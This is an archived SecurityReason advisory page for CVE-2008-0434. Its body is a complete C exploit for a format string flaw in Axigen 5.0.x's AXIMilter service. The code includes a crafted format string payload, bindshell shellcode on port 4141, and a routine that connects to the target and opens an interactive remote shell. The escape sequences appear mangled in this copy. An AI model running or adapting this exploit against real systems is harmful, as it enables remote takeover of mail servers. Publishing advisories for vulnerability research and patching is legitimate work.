|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3570 CVE : CVE-2008-0434 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : hempel Published : 24.01.2008
Advisory Text : /* * Axigen 5.0.x AXIMilter Format String Exploit * * by hempel (JAN 16 2008) * * thx to mu-b (digit-labs.org) * */ #include <stdio.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/uio.h> #include <unistd.h> #include <string.h> char buf[] = "FROM:rnEHLO:rnCNIP:rnCNPO:rnCNHO: " /* offsets */ "xb8x96x05x08xb9x96x05x08xbax96x05x08xbbx96x05x08" "xbcx96x05x08xbdx96x05x08xbex96x05x08xbfx96x05x08" "xc0x96x05x08" /* format string */ "%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%" "17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn" "rnRCPT:rnVERI: " /* bindshell code (port 4141) */ "x33xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xdc" "xc8x06xb7x83xebxfcxe2xf4xedx13x55xf4x8fxa2x04xdd" "xbax90x9fx3ex3dx05x86x21x9fx9ax60xdfxccxe5x60xe4" "x55x29x6cxd1x84x98x57xe1x55x29xcbx37x6cxaexd7x54" "x11x48x54xe5x8ax8bx8fx56x6cxaexcbx37x4fxa2x04xee" "x6cxf7xcbx37x95xb1xffx07xd7x9ax6ex98xf3xbbx6exdf" "xf3xaax6fxd9x55x2bx54xe4x55x29xcbx37" "rnPASS:rn"; static int shell_sock (char *host, int port) { struct sockaddr_in addr; int sockfd; sockfd = socket(PF_INET, SOCK_STREAM, 0); if (sockfd == -1) { perror ("socket"); return 0; } addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) { perror ("connect"); return 0; } return sockfd; } static void shell_run (int sockfd) { int rs; fd_set rset; char rbuf[1024], *cmd = "id; uname -a; uptimen"; write(sockfd, cmd, strlen(cmd)); while (1) { FD_ZERO (&rset); FD_SET (sockfd, &rset); FD_SET (STDIN_FILENO, &rset); select (sockfd + 1, &rset, NULL, NULL, NULL); if (FD_ISSET (sockfd, &rset)) { rs = read (sockfd, rbuf, sizeof(rbuf) - 1); if (rs <= 0) { perror("read"); return; } rbuf[rs] = '�'; printf ("%s", rbuf); } if (FD_ISSET (STDIN_FILENO, &rset)) { rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1); if (rs > 0) { rbuf[rs] = '�'; write (sockfd, rbuf, rs); } } } } int main(int argc, char **argv) { int sockfd, port, buf_len; struct sockaddr_in addr; char *host; printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempeln"); if (argc < 2) { printf("%s host portn", *argv); return 0; } host = argv[1]; port = atoi(argv[2]); sockfd = socket(PF_INET, SOCK_STREAM, 0); if(sockfd == -1) { perror("socket"); return -1; } addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) { perror("connect"); return -1; } buf_len = sizeof(buf) - 1; if (write(sockfd, buf, buf_len) == -1) { perror("write"); return -1; } close(sockfd); printf("trying shell at %s:4141 ...", host); fflush(stdout); sockfd = shell_sock(host, 4141); if (sockfd) { printf("w00t!n"); shell_run(sockfd); } else { printf("nope!n"); } return 0; }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |